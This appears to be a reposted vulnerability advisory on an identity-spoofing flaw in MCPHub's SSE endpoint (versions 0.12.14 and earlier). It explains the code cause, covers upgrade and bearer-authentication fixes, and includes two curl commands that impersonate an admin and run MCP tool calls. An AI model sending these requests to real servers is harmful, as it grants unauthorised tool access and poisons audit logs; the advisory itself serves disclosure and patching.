Listen to this Post
The vulnerability stems from the `sseUserContextMiddleware` function in `src/middlewares/userContext.ts` (lines 42-75), which extracts the username directly from the URL path parameter `req.params.user` without any authentication, validation, or database lookup. The middleware then constructs a fabricated `IUser` object using this attacker-controlled username and passes it to UserContextService.setCurrentUser(), which accepts the forged identity as legitimate. The server uses this identity to create a full MCP session and proxy subsequent tool calls. The source code itself contains a `TODO` comment acknowledging the missing validation.
The SSE route in `src/server.ts` (lines 132-161) applies only rate limiting and this vulnerable middleware, with no authentication checks in the chain. Additionally, `UserContextService` is a singleton that stores the current user in a single instance variable, allowing concurrent connections to silently overwrite each other’s context and creating a secondary race condition (CWE-362). An unauthenticated attacker can exploit this by connecting to the `/[:user]/sse` endpoint, impersonating any user—including administrators—and executing MCP tool calls under that fabricated identity. All MCPHub instances exposing SSE endpoints without bearer authentication are affected, including the default configuration.
DailyCVE Form:
Platform: Node.js npm
Version: ≤0.12.14
Vulnerability : Identity Spoofing
Severity: CRITICAL
date: 2026-05-14
Prediction: 2026-05-15
What Undercode Say:
Check for vulnerable versions npm list @samanhappy/mcphub Simulate exploitation (ethical use only) curl -s -N --max-time 3 http://TARGET:3100/admin/sse
Exploit:
Step 1: Impersonate any user via SSE
curl -s -N --max-time 3 http://TARGET:3100/CEO-admin-impersonated/sse
Expected response contains sessionId
Step 2: Execute MCP tool call as the impersonated user
curl -X POST http://TARGET:3100/CEO-admin-impersonated/messages?sessionId=54efc6f5-15ed-4e69-9a0e-de87d3179758 \
-H 'Content-Type: application/json' \
-d '{"jsonrpc":"2.0","id":1,"method":"tools/call","params":{"name":"any-tool","arguments":{}}}'
Protection from this CVE:
- Upgrade to MCPHub version 0.12.15 or later.
- Enable bearer authentication (
enableBearerAuth: true) and configure strong bearer tokens. - If upgrading is not immediately possible, block external access to SSE endpoints at the network perimeter.
Impact:
- Complete Account Impersonation: Attackers can impersonate any user, including administrators, without any credentials.
- Unauthorized Tool Execution: Full MCP tool access under the spoofed identity, leading to data breaches and lateral movement.
- Audit Log Poisoning: All malicious actions are logged under the impersonated user’s name, destroying forensic evidence.
- By design: The default configuration is vulnerable; no authentication is required.
🎯Let’s Practice Exploiting & Learn Patching For Free:
Sources:
Reported By: github.com
Extra Source Hub:
Undercode

